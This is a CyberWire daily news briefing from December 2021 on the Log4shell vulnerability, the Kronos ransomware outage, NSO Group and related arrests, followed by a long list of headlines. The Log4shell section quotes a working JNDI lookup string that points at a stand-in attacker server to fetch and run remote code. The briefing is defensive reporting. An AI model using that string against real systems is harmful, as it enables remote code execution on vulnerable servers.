Hopefully nothing. Don’t get tricked by hidden open source vulnerabilities that could harm your organization from the inside out. Leave gifts outside that don’t belong in of your software supply chain. Find your full-spectrum software supply chain security automation solution today.
The CyberWire Pro Q4 Cybersecurity Analyst Call will be held on Wednesday, December 15th, at 2:00 PM Eastern Standard Time. In this special look back at 2021, the CyberWire's CSO, Rick Howard, will be joined by Denise Anderson, President & CEO, Health-ISAC, and Jaclyn Miller, CISO, NTT Ltd. Hear their thoughts on the biggest developments in cybersecurity over the course of this year. Register here; we hope you can join us.
Criminals continue scanning for the Log4shell vulnerability, and they've moved from cryptojacking to ransomware installation to data theft. Organizations have begun their long slog through a remediation that will take months (if you follow the Wall Street Journal) or years (if you believe CRN) or "months if not years" (as in ZDNet's headline). In any case, consensus is that Log4j isn't going to be a simple fix. The vulnerable code is easy to exploit and is as close to ubiquitous as a Java logging package can be. The first step any organization should take is to determine where the library containing Log4j is actually used, and that's not a trivial task. As Duo Security observes, "Log4j is so prevalent - utilized by millions of third-party enterprise applications, cloud services and manufacturers, including Apple, Twitter and Tesla - that security teams may have difficulties pinpointing where the library is actually being used." And once they've been found, upgrade Log4j or applications that use it to Apache's latest version (v2.15.0).
Netsparker, which thinks Log4shell is arguably the "worst software vulnerability ever, offers a brief review of how the vulnerability might be exploited:
"The vulnerability is high-impact yet extremely easy to exploit. The attacker simply needs to prepare a malicious Java file, put it on a server they control, and include the following string in any data that will be logged by the application server: ${jndi:ldap://attackers-server.com/malicious-java-file}
"When the vulnerable server logs this string, Log4j will retrieve and execute Java code from an attacker-controlled server, allowing arbitrary code execution. If the code is a remote shell, the attacker will obtain a local shell with the privileges of the system user running the vulnerable application."
JFrog explains the implications: "This means that if any part of a logged string can be controlled by a remote attacker, the remote attacker gains remote code execution on the application that logged the string." Thus as Reuters reports, we're seeing the familiar race between offense and defense.
The US Cybersecurity and Infrastructure Security Agency (CISA) continues its active outreach to organizations affected by Log4shell. The organization met yesterday with critical infrastructure stakeholders, CyberScoop reports, and it's worth noting that in the US at least most of those stakeholders are in the private sector. The public sector hasn't escaped attention, either: on Friday CISA added Log4Shell to its Known Exploited Vulnerabilities Catalog of actively-exploited vulnerabilities, and it gave the Federal agencies under its jurisdiction until Christmas Eve, December 24th, to "Apply updates per vendor instructions." CISA is updating its Apache Log4j Vulnerability Guidance as new information becomes available. US Federal agencies and other interested organizations may follow updates there.
Scanning for vulnerable systems has been very widespread, ZDNet reports. Some of the earliest reports of exploitation in the wild involved, according to Cyberscoop, involved cryptojacking, but the crooks seem to have quickly moved on from this grubbiest level of cyber crime. Microsoft researchers are among those who detected cryptojacking efforts, but they also saw attempts to install Cobalt Strike "to enable credential theft and lateral movement, and exfiltrating data from compromised systems."
Since Cobalt Strike is a common ransomware precursor, Venture Beat and others predicted that ransomware exploiting the vulnerability would soon follow. (Indeed, Ars Technica speculates that Log4shell was used in the ransomware incident that this weekend hit payroll services provider Kronos. That account, however, is unconfirmed, more correlation at this stage than causation.) And Bitdefender has reported finding Log4shell exploited to install the relatively new Khonsari ransomware strain as well as the Orcus remote access Trojan.
And threat actors haven't been content to stick with the original exploits. Check Point reports that "new variations of the original exploit [are] being introduced rapidly- over 60 in less than 24 hours."
Industrial control system security specialists at Dragos have evaluated the implications of the vulnerability for operational technology (OT) networks. "Dragos assesses with moderate confidence that as network defenders close off more simplistic exploit paths and advanced adversaries incorporate the vulnerability in their attacks, more sophisticated variations of Log4j exploits will emerge with a higher likelihood of directly impacting Operational Technology networks." They recommend that organizations move to an "assume breach" posture, and they also provide a useful set of steps that can be followed to locate Log4j in an enterprise's systems. In sum their recommendations are similar to those offered by CISA. Sergio Caltagirone, Vice President of Threat Intelligence at Dragos, summed up the company's advice in an email:
“Log4j is used heavily in external/internet-facing and internal applications which manage and control industrial processes leaving many industrial operations like electric power, water, food and beverage, manufacturing, and others exposed to potential remote exploitation and access. Dragos identified active exploitation of vulnerability CVE-2021-44228 and has provided immediate detection support and specific intelligence to industrial customers. It’s important to prioritize external and internet-facing applications over internal applications due to their internet exposure, although both are vulnerable. Dragos recommends all industrial environments update all affected applications where possible based on vendor guidance immediately and employ monitoring that may catch exploitation and post-exploitation behaviors.”
So how widespread is the Log4shell vulnerability? It's literally interplanetary: Log4j is in the code aboard NASA's Ingenuity Mars probe, the one with the helicopter.
The CyberWire's ongoing coverage of Log4shell may be found here.
UKG Kronos has disclosed to its users that the Kronos Private Cloud is currently down due to a ransomware attack. There are few details about the specific nature of the attack, but the business services customers depend upon from Kronos may, the company says, be unavailable for some weeks. Prominent among those services are payroll processing and human resources functions. The interruption of payroll processing comes, ZDNet notes, at a particularly unfortunate time during the holiday season.
The Times of Israel reports that NSO Group, feeling pressure from US sanctions and the widespread odium abuse of its surveillance tools has attracted, is to be considering the sale of its Pegasus unit. There are thought to be two potential, unnamed suitors. Should NSO Group succeed in offloading Pegasus in exchange for a cash infusion, the company is expected to shift to purely defensive products and services. Haaretz thinks other Israeli firms also in the intercept or surveillance business may eventually come under US sanction.
A BBC investigation of Nigeria's Black Axe gang, a curious combination of student fraternity, quasi-religious cult, and criminal organization, finds that the group is engaged in far more lethal operations than the crude advance-fee scams it's commonly associated with.
Europol describes the operation in which it, with the US FBI, supported the Romanian National Police arrested "a ransomware affiliate targeting high-profile organisations and companies for their sensitive data."
The Washington Post finds Huawei documents suggesting a closer connection to Chinese state surveillance than Huawei has yet acknowledged.
Today's issue includes events affecting Australia, Canada, China, the European Union, France, Germany, Ireland, Nigeria, the Philippines, Romania, Russia, Taiwan, Ukraine, the United Kingdom, and the United States.
If you read the monthly Cosmic AES Signals & Space briefing, prepared by the CyberWire, we would love a chance to hear from you. Take our survey and submit your feedback to help us make Signals & Space even better. And if you aren’t a reader yet, head over to Cosmic AES Tech News to read and subscribe. Subscribers who complete the survey will have a chance to win a $100 gift card (if you're into raffles and suchlike).
Tanium, the provider of endpoint management and security built for the world’s most demanding IT environments, commissioned a recent independent study from Forrester Consulting. The findings reveal compelling data that we believe reinforces Tanium’s value for public and private organizations of all sizes. Learn how your organization could experience up to 277% ROI and $3.9M net present value over three years by leveraging Tanium to continuously improve IT hygiene.
Log4shell is now undergoing active exploitation. (The CyberWire) Criminals continue scanning for the Log4shell vulnerability, and they've moved from cryptojacking to ransomware installation to data theft. Organizations have begun their long slog through a remediation that will take months (if you follow the Wall Street Journal) or years (if you believe CRN) or "months if not years" (as in ZDNet's headline). Remediation won't be easy or simple or quick, but it begins in situational awareness with respect to an organization's code.
CISA to brief critical infrastructure companies about urgent new Log4j vulnerability (CyberScoop) The Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency will host a call with critical infrastructure stakeholders Monday afternoon about a critical vulnerability affecting products with the Log4j software library, according to a statement.
CISA tells federal agencies to patch Log4Shell before Christmas (The Record by Recorded Future) The US Cybersecurity and Infrastructure Security Agency has told federal civilian agencies to patch systems affected by the Log4Shell vulnerability by Christmas Eve.
CISA Urges Quick Action on ‘Log4j’ Critical Vulnerability (MeriTalk) The Cybersecurity and Infrastructure Security Agency (CISA) released a statement on Dec. 11 with guidance for organizations to protect themselves against the “log4j” critical vulnerability that surfaced over the weekend.
CISA adds Log4j to critical vulnerabilities list, warns industry to follow similar guidelines (SC Media) The move adds the damaging bug to a recently established catalog of high-profile vulnerabilities that most agencies must prioritize for patching and mitigation within two weeks.
CISA Expands 'Must-Patch' List With Log4j, FortiOS, Other Vulnerabilities (SecurityWeek) CISA has added 13 new vulnerabilities to its list of security errors known to be exploited, including Apache Log4j and Fortinet FortiOS bugs that were disclosed last week.
CISA warns 'most serious' Log4j vulnerability likely to affect hundreds of millions of devices (CyberScoop) Cybersecurity and Infrastructure Security Agency Director Jen Easterly told industry leaders in a phone briefing Monday that a vulnerability in a widely-used logging library “is one of the most serious I’ve seen in my entire career, if not the most serious.”
Widely used software with key vulnerability sends cyber defenders scrambling (Reuters) A newly discovered vulnerability in a widely used software library is causing mayhem on the internet, forcing cyber defenders to scramble as hackers rush to exploit the weakness.
What to know about the latest cybersecurity bug in log4j (Popular Science) A serious new software bug could impact Apple’s iCloud, Microsoft’s Minecraft, Baidu, IBM, Amazon Web Service, and others.
Implications of Log4j Vulnerability for Operational Technology (OT) Networks (Dragos) Understand the impact of the zero-day remote code execution (RCE) vulnerability, CVE-2021-44228, affecting Apache Log4j to Operational Technology (OT) networks.
Critical Log4Shell (Apache Log4j) Zero-Day Attack Analysis (CVE-2021-44228) (Nozomi Networks) An analysis of the Apache Log4j vulnerability and the architecture of zero-day exploits (CVE-2021-44228) from Nozomi Networks Labs.
Apache Log4j security flaw presents critical risk to organizations (Security Magazine) Threat actors are actively exploiting a critical security flaw in Java logging library Apache Log4j. Log4j is an open-source, Java-based logging utility widely used by enterprise applications and cloud services, meaning many organizations are at risk from threat actors actively exploiting this vulnerability.
The new Log4Shell could be the worst software vulnerability ever (Netsparker) The Log4Shell vulnerability in Log4j has left thousands of Java applications vulnerable to remote code execution. This post summarizes what we know so far, how you can mitigate the vulnerability, and what to expect in the coming days.
Cyber experts express growing alarm over Apache vulnerability (TheHill) A vulnerability in a widely-used logging platform uncovered late last week has left security professionals and officials scrambling to respond and patch systems before other nations and cybercriminals can exploit the flaw.
Log4j Exploit Is ‘A Fukushima Moment’ For Cybersecurity: Tenable CTO (CRN) Businesses around the world will spend years dealing with the repercussions from critical vulnerabilities discovered in Apache log4j, Tenable Co-Founder and CTO Renaud Deraison predicted.
Log4Shell 'biggest vulnerability in computing history' (Information Age) Easily exploitable logging library triggers global panic.
What Is the Log4j Vulnerability? (Wall Street Journal) A flaw in widely used internet software has left companies and government officials scrambling to respond to a potentially glaring cybersecurity threat to global computer networks.
The Log4Shell 0-day, four days on: What is it, and how bad is it really? (Ars Technica) If max-severity 0-day hasn't already dampened your Xmas spirit, it likely soon will.
Log4Shell Is Spawning Even Nastier Mutations (Threatpost) The cybersecurity Hiroshima of the year – the Apache Log4j logging library exploit – has spun off 60 bigger mutations in less than a day, researchers said.
Log4Shell (CVE-2021-44228) – What You Need to Know (Deep Instinct) On December 9, a severe remote code execution vulnerably was disclosed in Apache’s logging tool, Log4j2 – a widely-used open-source Java framework used for logging by countless commercial, non-commercial, and internally-developed applications and users – affecting all previous versions of the framework.
Here's Everything To Know About The 0-Day Log4Shell Vulnerability (JFrog) Understand the Log4Shell exploitation vectors, learn exactly what's vulnerable, and discover remediations about this zero-day vulnerability.
Critical Log4j Flaw Fallout Continues (Decipher) The widespread usage of Log4j is adding complexity to organizations attempting to apply patches.
Log4Shell Vulnerability is the Coal in our Stocking for 2021 (McAfee Blogs) Overview: On December 9th, a vulnerability (CVE-2021-44228) was released on Twitter along with a POC on Github for the Apache Log4J logging library. The
Software Vulnerability Expected to Persist, Possibly for Months (Wall Street Journal) A flaw in a widely used piece of internet software is prompting companies to rush to update their systems and prevent cyberattacks, but the technology’s ubiquity means the threat could affect businesses for months.
Log4j flaw repercussions will last years: experts (CRN Australia) The software's ubiquity could mean widespread global disruption.
Log4j update: Experts say log4shell exploits will persist for 'months if not years' (ZDNet) As attacks exploiting the Log4j flaw evolve, experts worry about how long it will take organizations will respond.
Log4Shell vulnerability: What we know so far (WeLiveSecurity) The zero-day flaw in the ubiquitous Log4j utility has sent shockwaves far beyond the security industry – here’s what you should know.
Log4j zero-day flaw: What you need to know and how to protect yourself (ZDNet) The Log4j vulnerability affects everything from the cloud to developer tools and security devices. Here's what to look for, according to the latest information.
Widely used software with key vulnerability sends cyber defenders scrambling (Euronews) A newly discovered vulnerability in a widely used software library is causing mayhem on the internet, forcing cyber defenders to scramble as hackers rush to exploit the weakness.
CVE-2021-44228: New Updates to the Hacker’s Playbook – Apache Log4j Vulnerability (Safebreach) On December 9th, 2021, the security community became aware of a newly discovered zero-day vulnerability (CVE-2021-44228) affecting Log4j versions 2.0-beta9 to 2.14.1.
Log4j flaw: Attackers are making thousands of attempts to exploit this severe vulnerability (ZDNet) Cybersecurity researchers warn over attackers scanning for vulnerable systems to install malware, steal user credentials, and more.
Log4j exploits suggest attackers gearing up for ransomware (VentureBeat) Attackers may be using the Apache Log4j vulnerability, known as Log4Shell, to lay the groundwork for a ransomware attack, researchers said.
Hackers Exploit Log4j Vulnerability to Infect Computers with Khonsari Ransomware (The Hacker News) Hackers Exploiting Log4j Vulnerability to Infect Windows PCs with Khonsari Ransomware
Log4J – A Look into Threat Actors Exploitation Attempts (Cato Networks) On December 9, a critical zero-day vulnerability was discovered in Apache Log4j, a very common Java logging tool. Exploiting this vulnerability allows attackers to take control over the affected servers, and this prompted a CVSS (Common Vulnerability Scoring System) severity level of 10.
Where the Latest Log4Shell Attacks Are Coming From (Threatpost) Analysts find at least 10 Linux botnets actively exploiting Log4Shell flaw.
The Log4j software bug could put your favorite sites at risk (CNET) Casual computer users might not have heard of the logging software, but it's used across the internet.
As Log4Shell wreaks havoc, payroll service reports ransomware attack (Ars Technica) Kronos outage will last several weeks. Firm advises customers to use other services.
Responding to the Log4Shell Vulnerability (Panorays) This post details everything you need to know about this new vulnerability—from how to tell if you’re exposed, to how to respond.
Security company offers Log4j 'vaccine' for systems that can't be updated immediately (ZDNet) Experts said the fix offered limited protection and is only a stop-gap solution.
Cato Networks Rapid Response to The Apache Log4J Remote Code Execution Vulnerability (Cato Networks) On December 9th, 2021, the security industry became aware of a new vulnerability, CVE-2021-44228. With a CVSS (Common Vulnerability Scoring System) score of a perfect 10.0, CVE-2021-442288 has the highest and most critical alert level.
Companies Respond to Log4Shell Vulnerability as Attacks Rise (SecurityWeek) Government organizations and the private sector are responding to the disclosure of a critical vulnerability (CVE-2021-44228) affecting the widely used Log4j logging utility, as exploitation attempts are on the rise
Log4j software vulnerability: Major tech companies rush to fix software after US govt’s warning (The Indian Express) The flaw in the Log4j software could allow hackers unfettered access to computer systems and has prompted an urgent warning by the US government’s cybersecurity agency.
Cyber flaw within CRA, Quebec also prevalent in private sector, experts warn (Global News) Experts describe the software flaw as``leaving the back door open'' in that it could give cyber criminals access to the thousands of organizations that use the logging library.
Minecraft Java players advised to update game to fix major security exploit (Polygon) The vulnerability could compromise your computer
Apache Log4j Vulnerability in NetApp Products [CVE-2021-44228] (SystemTek) Note : If your looking for our main article on the Apache Log4j vulnerability – click here Multiple NetApp products
Canadian websites temporarily shut down as world scrambles to mitigate or patch Log4Shell vulnerability (IT World Canada) Federal and provincial departments including the Canada Revenue Agency, Employment and Social Development Canada and the Toronto region transportation system Metrolinx took their websites offline over the weekend to deal with the critical log4j2 Java library vulnerability. In Quebec, provincial Digital Transformation and Access to Information Minister Eric Caire was quoted as saying almost 4,000 […]
Kronos ransomware attack may cause weeks of HR solutions downtime (BleepingComputer) Workforce management solutions provider Kronos has suffered a ransomware attack that will likely disrupt many of their cloud-based solutions for weeks.
Kronos hit with ransomware, warns of data breach and 'several week' outage (ZDNet) The HR management platform has already informed major customers, like the city government of Cleveland, about the attack.
UKG expects weeks of downtime after ransomware attack (The Record by Recorded Future) UKG, a company that provides payroll and human resource management software, said today that it might need up to several weeks to restore cloud systems impacted by a ransomware attack that hit its systems over the weekend.
Communications sent to impacted Kronos Private Cloud (KPC) customers beginning December, 13 at 12:45AM ET (Kronos Customer & Partner Community) We are reaching out to inform you of a cyber security incident that has disrupted the Kronos Private Cloud.
Mirai-Based 'Manga' Botnet Targets Recent TP-Link Vulnerability (SecurityWeek) A newly discovered variant of the Mirai-based Manga botnet is targeting a vulnerability in TP-Link routers that was addressed last month.
Bugs in billions of WiFi, Bluetooth chips allow password, data theft (BleepingComputer) Researchers at the University of Darmstadt, Brescia, CNIT, and the Secure Mobile Networking Lab, have published a paper that proves it's possible to extract passwords and manipulate traffic on a WiFi chip by targeting a device's Bluetooth component.
TinyNuke info-stealing malware is again attacking French users (BleepingComputer) The info-stealing malware TinyNuke has re-emerged in a new campaign targeting French users with invoice-themed lures in emails sent to corporate addresses and individuals working in manufacturing, technology, construction, and business services.
CISA: Authentication Flaw in Certain Hillrom Cardio Products (GovInfoSecurity) Federal regulators are warning healthcare sector entities worldwide that an authentication vulnerability in a variety of Hillrom Welch Allyn cardio products, if
Ransomware attack shuts down computer systems for Virginia legislative agencies (Richmond Times-Dispatch) A ransomware attack has forced the shutdown of computer systems and websites for Virginia legislative agencies and commissions, including the Division of Capitol Police and the Division of Legislative Services,
The General Assembly is dealing with a cyberattack (VA Scope) A staffer for the Republican Caucus in the House of Delegates confirmed that a ransomware attack is taking place on the General Assembly’s VITA system.
A division of Virginia’s General Assembly is dealing with ransomware attack (Washington Post) The information technology arm of the state’s legislative branch has been hit by a ransomware cyberattack, and Gov. Ralph Northam (D) has ordered state agencies to assist in the response, according to a spokeswoman for the governor.
Inside Ireland’s Public Healthcare Ransomware Scare (KrebsOnSecurity) The accounting firm PricewatersCoopers recently published lessons learned from the disruptive and costly ransomware attack in May 2021 on Ireland's public health system. The unusually candid post-mortem found that nearly two months elapsed between the initial intrusion and the launching…
BSP, BDO coordinating on hacked accounts (The Manila Times) Following reports of hacked BDO Unibank Inc. accounts, the Bangko Sentral ng Pilipinas (BSP) said it is closely coordinating with the bank for possible reimbursements.BSP Governor...
Logistics Firm Hellmann Scrambling to Recover From Cyberattack (SecurityWeek) International logistics company Hellmann Worldwide Logistics is scrambling to restore operations after a cyberattack forced it to isolate its central data center from the rest of its environment.
Hackers Steal $140 Million From Users of Crypto Gaming Company (Vice) VulcanForge becomes the third cryptocurrency company to be hit by hackers this month. In total, hackers have stolen more than $400 million.
Bored Ape Yacht Club: Someone accidentally sold a $300,000 NFT for $3,000 (CNET) "Fat finger" errors occasionally happen in traditional finance, but they're usually stopped or reversed. Not so with NFTs and cryptocurrency.
Curran says 11-day email, computer outage in Oyster Bay is 'unacceptable' (Newsday) Oyster Bay’s computer outage entered its 11th day on Monday as emails to town officials continued to bounce back to the senders, a situation Nassau County Executive Laura Curran called "unacceptable."
The time I almost got scammed from my college email (Avast) Read your emails with a critical eye. Any “opportunity” that seems too good to be true likely is just that: too good to be real. Here are a few additional steps that you can take to prevent yourself from being scammed.
PrimeXM Explains How It Dealt with Ransomware Attack (Finance Feeds) The FX technology provider has shared the sequence of events in regard to the attack on parts of its hosting infrastructure.
Vulnerability Summary for the Week of December 6, 2021 (CISA) The CISA Vulnerability Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. NVD is sponsored by CISA. In some cases, the vulnerabilities in the bulletin may not yet have assigned CVSS scores. Please visit NVD for updated vulnerability entries, which include CVSS scores once they are available.
Employees think they're safe from cyberthreats on company devices (Help Net Security) Menlo Security reveals increased cybersecurity risks posed to employees and organizations during the 2021 holiday shopping season.
The state of U.S. cybersecurity a year after the SolarWinds hack (NPR) One year ago, Russian hackers burrowed their way deep inside a network monitoring tool made by a company called SolarWinds. How much has changed in U.S. cybersecurity since then?
Opportunity for Software Security to Shift Further Left to Become SecDevOps, According to Veracode (Veracode) 133 percent growth in static scans initiated by an API call, rather than by a human, reveals a massive shift towards automation
Cybercriminals Set Their Sight on IT & Tech Companies, Finds New Report by Keeper Security (Businesswire) IT and technology companies in the UK have experienced an average of 44 cyberattacks in the last 12 months - roughly one every 8 days - according to n
Remote work culture makes traditional network perimeter obsolete; securing identities becomes key (SiliconANGLE) Remote work culture makes traditional network perimeter obsolete; securing identities becomes key - SiliconANGLE
Cyberhaven Raises $33M in Series B Funding to Transform Stagnant and Ineffective Data Protection Market (Cyberhaven) Company Grows ARR 5x in Last 12 Months as Customer Demand Accelerates
Sumo Logic Strengthens Investment in India as Customers and Partners Accelerate Security Operations Modernization (Sumo Logic) Delivers Regional Access to Sumo Logic Cloud SIEM and Appoints New Country Leader as Cloud Initiatives Drive Growth in the Region
Polymer lands $4M to bring no-code data loss prevention to SaaS apps (VentureBeat) Polymer says its no-code platform enables automated data loss prevention (DLP) for SaaS apps, including Microsoft Teams and Google Drive.
Crosspoint Capital Partners Completes Significant Strategic Investment in DigiCert in Partnership with Clearlake Capital and TA Associates (DigiCert) DigiCert, Inc., the world’s leading provider of TLS/SSL, PKI and IoT solutions, today announced that Crosspoint Capital Partners, L.P. has completed an investment in the Company.
Dazz, from ex-Microsoft team, gets $60M to automate cloud security (VentureBeat) Dazz, founded by former Microsoft security executives, has raised $60 million for its platform that brings automation to cloud security.
Telcos ramping up investments in cybersecurity (BusinessWorld Online) THE PLDT group and Globe Telecom, Inc. on Monday said investments in their cybersecurity capabilities have been increasing, as they continue to work to protect their customers from online threats.
Bug-Bounty Programs Shift Focus to Most Critical Flaws (Dark Reading) The number of bug bounty programs jumped by a third, the median payout for a critical vulnerability report rose to $3,000, but rewards for easier-to-find lower-severity flaws stagnated in 2021.
Intel adds payout bonuses as it migrates bug bounty program to Intigriti (The Daily Swig) Payout ceiling lifted from $100,000 to $150,000 for 12-month bonus period
Embattled NSO said considering closing its Pegasus unit, selling to Americans (Times of Israel) Tech firm behind the contentious spyware is reportedly at risk of defaulting on its debt, and is seeking an outside injection of capital and a business pivot to keep it afloat
As New York bank begins minting stablecoins, security concerns ensue (SC Media) The stablecoin market has grown more than tenfold in the past year from a market cap of $20 billion last year to more than $137 billion in November 2021.
Kaspersky Opens Doors to New Transparency Center in North America (Dark Reading) The opening marks the fifth center opened globally, fulfilling a key milestone within the Global Transparency Initiative.
Palo Alto Networks joins the Nasdaq-100 (PR Newswire) Palo Alto Networks (NASDAQ: PANW), the global cybersecurity leader, shared today that it has joined the Nasdaq-100® Index, the top 100 largest...
Fortinet Named to Nasdaq-100 Index (Yahoo) Ken Xie, Founder, Chairman of the Board and CEO at Fortinet“Fortinet has led the evolution of cybersecurity innovation over the past two decades, and is leading the next-generation of security solutions. The network security market is rapidly expanding from the data center out to the work-from-anywhere edge and to the cloud. We expect our innovative ASIC-supported security fabric platform and converged Security-driven networking approach to un
The Cyber Guild Honors Eight Capital Region Cybersecurity Leaders at Third Annual Cybersecurity Awards Ceremony (Yahoo Finance) The Cyber Guild, the only Virginia cybersecurity trade association, honored eight Capital Region cybersecurity leaders at this year's third annual Cybersecurity Awards ceremony held on December 8 at Refraction.
Arctic Wolf Appoints Andrew Hill as Chief Legal Officer and General Counsel (Arctic Wolf) Industry veteran brings decades of experience as corporate counsel for high-growth technology companies
Feedzai Grows 125%, Hires new CRO, General Counsel, and brings in a new independent board member (GlobeNewswire News Room) 125% year-over-year ARR growth in Q3 with multiple new customers in North America, Europe, Latin America, and Asia.New Chief Revenue Officer and General...
TripleBlind expands leadership team with four hires (KC Inno) Kansas City-based TripleBlind is building on its momentum with the addition of executive hires.
LookingGlass Promotes Cody Pierce to Chief Product Officer (GlobeNewswire News Room) New role deepens the alignment of the company’s growth with the expansion its product line....
Exabeam Welcomes Gianna Driver As Chief Human Resources Officer (Security Informed) Exabeam, the pioneer in Next-gen SIEM and XDR announced the appointment of Gianna Driver as Chief Human Resources Officer (CHRO). As CHRO, Driver is chartered with creating scalable processes that will enrich the employee experience and enable Exabeam employees to do their best work.
Deduce Makes Key Additions to its Executive Team (Enterprise Security Magazine) It is the leadership and executive team's obligation to secure the company and its data by identifying threats, analyzing their impact, and taking...
PerimeterX Prevents Over $1.5B in Losses from Account and Purchase Fraud Over Cyber 5 (PerimeterX) We saw some interesting trends during the Cyber 5 shopping period that give a preview into the future threat landscape.
Apple launches AirTags and Find My app for Android, in effort to boost privacy (CNET) Apple's following through on a promise to help Android users identify nearby AirTags and Find My trackers that aren't with their owners.
Her Instagram Handle Was ‘Metaverse.’ Last Month, It Vanished. (New York Times) Five days after Facebook changed its name to Meta, an Australian artist found herself blocked, with seemingly no recourse, from an account documenting nearly a decade of her life and work.
Iron Bow to Offer Xage Zero Trust Security Platform to Military, Government Customers (ExecutiveBiz) Iron Bow Technologies has partnered with Xage to offer the latter's zero trust security platform to the Department of Defense and federal government customers.Under the deal, Iron Bow will serve as a distributor of the Xage Fabric remote access authentication tool built to protect connected digital systems and communications networks from unauthorized access, Xage said
Network Security Leader iboss Joins ForgeRock Trust Network (PRWeb) iboss, the leading SASE cloud security provider, today announced it has joined the ForgeRock (NYSE: FORG) Trust Network, an exclusive technology ecosystem of over
Ukrainian cyber police will work hand in hand with DeHealth to strengthen the protection of medical data (StreetInsider.com) Oleksandr Hrynchak, the Head of the Cyber Police Department, and Anna Bondarenko, the Co-Founder of DeHealth, signed a memorandum of cooperation. Both parties will share their...
ImmuniWeb and CERT.LV Join Efforts to Fight Cybercrime (ARN) ImmuniWeb will support CERT.LV educational and cyber-defense activities to prevent financially motivated cyber-attacks, reinforce cyber-resilience and reduce losses from cybercrime in the region.
USPS built and secretly tested a mobile voting system before 2020 (Washington Post) Such systems are widely considered insecure against hacking
CISA Issues Guidance on Social Media Account Protection (Executive Gov) The Cybersecurity and Infrastructure Security Agency has introduced new guidance providing ways to ensure the security of social media accounts operated by
NIST Seeks Comments on Project Draft for IPv6-Only Implementation (Executive Gov) The National Institute of Standards and Technology's National Cybersecurity Center of Excellence has drafted a project description for implementing a secure
Defense Department blocks ads to counter malvertising, official tells Congress (CyberScoop) The Defense Department employs multiple methods of blocking internet advertisements because of the threats that malicious ads pose, the Pentagon said in a letter Monday.
Tales from the Dark Web: Fingerprinting Access Brokers on Criminal Forums (Dark Reading) Every high-profile breach leaves a trail of bread crumbs, and defenders who monitor access brokers can connect the dots and detect attacks as they unfold.
Shoring up the solar industry’s resilience to cyberattack (pv magazine USA) As solar and storage technologies are deployed on the grid in record numbers, there’s no time like the present to take steps to prevent solar and storage from being vulnerable to cyberattack.
SOC Denial is Real in the 3rd Annual Devo SOC Performance Report (GlobeNewswire News Room) Report finds that while external risk factors continue to accelerate, internal roadblocks and leadership disconnect have stalled even high-performing...
Why proactive cyber defence is essential (teiss) So don't depend on detection alone; at the very least invest in detection + containment, and ideally map out a path to enhancing preventative controls.
KnowBe4 Releases Top 5 Cybersecurity Tips for the 2021 Holiday Season (GlobeNewswire News Room) Shopping scams, gift card payment requests and other dangerous tricks threaten to ruin the holiday season...
Cybersecurity 'Vaccines' Emerge as Ransomware, Vulnerability Defense (eSecurityPlanet) Vaccines have emerged as a critical tool for stopping cybersecurity threats - but they have their limitations.
Australia launches national AI centre in CSIRO's Data61 (ZDNet) The new AI centre will work on reducing barriers faced by small to medium-sized businesses in adopting and developing AI and emerging technology.
The End of Cyber-Anarchy? (Foreign Affairs) How to build a new digital order.
Documents link Huawei to China’s surveillance programs (Washington Post) The Chinese tech giant Huawei Technologies has long brushed off questions about its role in China’s state surveillance, saying it just sells general-purpose networking gear.
The Growing Danger of U.S. Ambiguity on Taiwan (Foreign Affairs) Biden must make America’s commitment clear to China—and the world.
Online Safety Bill: New offences and tighter rules (BBC) New criminal offences and major changes have been proposed in the UK's landmark Online Safety Bill, which seeks to regulate social media and tech giants.
Joint Committee recommends 'major changes' in Online Safety Bill (Computing) The Bill should cover more criminal offences to regulate "land of the lawless"
UAE Law Regarding the Protection of Personal Data (JD Supra) The United Arab Emirates joins Saudi Arabia by passing Federal Decree-Law No (45) of 2021 Regarding the Protection of Personal Data (“PPD Law”) to...
Not just NSO: Israel fears U.S. targeting all Israeli offensive cyber firms (haaretz.com) The days in which NSO worked in secret with the active encouragement of PM Netanyahu and the intelligence community are over, never to return
America’s Cyber-Reckoning (Foreign Affairs) How to fix a failing strategy.
James Stavridis - Four Ways the US Can Keep Putin From Invading Ukraine (Asharq AL-awsat) When I became the supreme military commander at the North Atlantic Treaty Organization in 2009, the alliance was focused on the war in Afghanistan. But one of the first senior delegations to visit me came to discuss Russia: the military chiefs of Est
Biden will sign an executive order to move government services online (Protocol) The order will direct 17 agencies to overhaul the way they interact with Americans, including allowing them to apply for things like passports online.
Cyberattacks on our energy infrastructure: The need for a national response to a national security threat (Atlantic Council) Secretary Jeh Johnson calls for a cohesive national response to combat the growing cyber threat to our nation's energy infrastructure. He lays out several recommendations for a path forward.
Why Classifying Ransomware as a National Security Threat Matters (Dark Reading) Government actions help starve attack groups of the resources - money, ability to recruit, and time.
The Cyber Trap is Broken – 94 Percent of Federal Cyber Decision-Makers See Flaws in Today’s Cybersecurity Strategies (Businesswire) New research finds that the Cybersecurity EO brings cyber issues to the forefront, but Federal leaders need to shift gears to make real progress.
CIOs at HHS, TSA, CTO at Justice leaving federal service (Federal News Network) Long-time data guru Tom Beach joins the FDA while GSA shuffles some seats after Carlton Shufflebarger retires after 37 years in government.
N.C. Department of Information Technology Hires State's First Chief Privacy Officer (North Carolina Department of Information Technology) As chief privacy officer, Cherie Givens is tasked with managing risk related to information privacy laws and compliance regulations. The role was created to allow for stronger authority for making privacy decisions and protecting the interests of North Carolina residents, businesses and visitors.
The ultra-violent cult that became a global mafia (BBC News) A BBC investigation into Black Axe has unearthed new evidence of political infiltration, and a scamming and killing operation spanning the globe.
Ukraine arrests 51 for selling data of 300 million people in US, EU (BleepingComputer) Ukrainian law enforcement arrested 51 suspects believed to have been selling stolen personal data on hacking forums belonging to hundreds of millions worldwide, including Ukraine, the US, and Europe.
Germany Jails Operators of 'Cyberbunker' Darknet Hub (SecurityWeek) Eight people were handed jail sentences in Germany for operating a web-hosting service known as "cyberbunker" in a former NATO bunker that enabled illegal trade in drugs, stolen data and child pornography.
Ransomware Affiliate Arrested in Romania (SecurityWeek) Europol and the Romanian National Police on Monday announced the arrest of an individual allegedly involved in a ransomware operation targeting multiple high-profile organizations.
Ransomware suspect arrested over attacks on 'high-profile' organisations (ZDNet) Europol, FBI and Romanian Police operation leads to a suspect being detained over ransomware attacks.
